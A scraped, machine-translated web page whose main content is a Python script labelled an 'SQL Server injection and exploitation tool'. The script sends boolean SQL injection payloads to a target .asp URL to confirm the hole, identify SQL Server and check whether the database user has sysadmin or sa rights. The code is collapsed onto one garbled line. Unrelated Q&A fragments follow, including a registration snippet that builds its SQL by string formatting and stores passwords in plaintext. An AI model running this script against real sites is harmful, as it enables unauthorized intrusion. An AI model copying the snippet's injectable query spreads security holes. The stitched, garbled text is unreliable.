Python programming method for detecting database SA users, python programming Database sa

Source: Internet
Author: User
Tags sql server injection

Python programming method for detecting database SA users, python programming Database sa

This article describes a small program written in Python, which is used for links with injection points to check whether the current database user is sa. The detailed code is as follows:

# Code by zhaoxiaobu Email: little.bu@hotmail.com #-*-coding: UTF-8-*-from sys import exit from urllib import urlopen from string import join, strip from re import search def is_sqlable (): sql1 = "% 20and % 201 = 2" sql2 = "% 20and % 201 = 1" urlfile1 = urlopen (url + sql1) urlfile2 = urlopen (url + sql2) htmlcodes1 = urlfile1.read () htmlcodes2 = urlfile2.read () if not search (judge, htmlcodes1) and search (judge, htmlcodes2 ): Print "[information] Congratulations! This URL has the injection vulnerability! N "print" [information] determine whether the database is an SQL Server. Please wait... "is_SQLServer () else: print" [Error] Are you sure this URL is usable? Try another one! N "def is_SQLServer (): SQL =" % 20and % 20 exists % 20 (select % 20 * % 20 from % 20 sysobjects) "urlfile = urlopen (url + SQL) htmlcodes = urlfile. read () if not search (judge, htmlcodes): print "[Error] The database does not seem to be from SQL Server! N "else: print" [information] confirm it is an SQL Server database! N "print" [information] starts to check the current database user permissions. Please wait ...... "is_sysadmin () def is_sysadmin (): SQL =" % 20and % 201 = (select % 20IS_SRVROLEMEMBER ('sysadmin') "urlfile = urlopen (url + SQL) htmlcodes = urlfile. read () if not search (judge, htmlcodes): print "[Error] the current database user does not have sysadmin permission! N "else: print" [information] the current database user has sysadmin permission! N "print" [information] Check whether the current user is SA. Please wait ...... "is_sa () def is_sa (): SQL =" % 20and % 20 'sa '= (select % 20System_user) "; urlfile = urlopen (url + SQL) htmlcodes = urlfile. read () if not search (judge, htmlcodes): print "[Error] the current database user is not SA! N "else: print" [information] the current database user is SA! N "print" n ################################### ##################################### n "print "^ o ^ SQL Server injection and exploitation tool ^ o ^" print "Email: little.bu@hotmail.comn "print" ============================================= ======================================== "; url = raw_input ('[info] Please enter a link that may have an injection vulnerability! NURL: ') if url = '': print" [Error] The provided URL must have'. asp? Xxx = 'format "exit (1) judge = raw_input (" [information] provide a judgment string. n judgment string: ") if judge ='': print "[Error] Judgment string cannot be blank! "Exit (1) is_sqlable ()

I wrote a python program. The database uses sqlite and extracts the account data from the database. Can't I tell whether the new user name exists?

Just change it.

Def reg ():
Account = raw_input ('Enter the account :')
If account. strip () = '': # removes spaces at the beginning and end by default.
Print u'name cannot be blank'
Return (reg)
Else:
Query = "select account from User where account = '% S'" % account
Cur.exe cute (query)
Existaccount = cur. fetchall ()
Print existaccount
If not existaccount:
While True:
Password = raw_input ('Please enter your password % s:' % account)
Password1 = raw_input ('ask the USER % s to enter the password again:' % account)
If password = password1:
User_name = raw_input ('input name :')
Cur.exe cute ('insert INTO User (user_name, account, password) VALUES (?,?,?) ', (User_name, account, password ))
Con. commit ()
Print ('Congratulations to USER % s. Registration successful !!! ') % Account
Cur. close ()
Con. close ()
Break
Else:
Print 'inconsistent Password Input'
Else:
Print 'user name % s already exists' % account

How do I set sa users for SQL Server databases?

What does this mean? Are you going to create another user? Or what?

Sa is set when SQLSERVER is installed, you only need to fill in the password, this user will exist.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.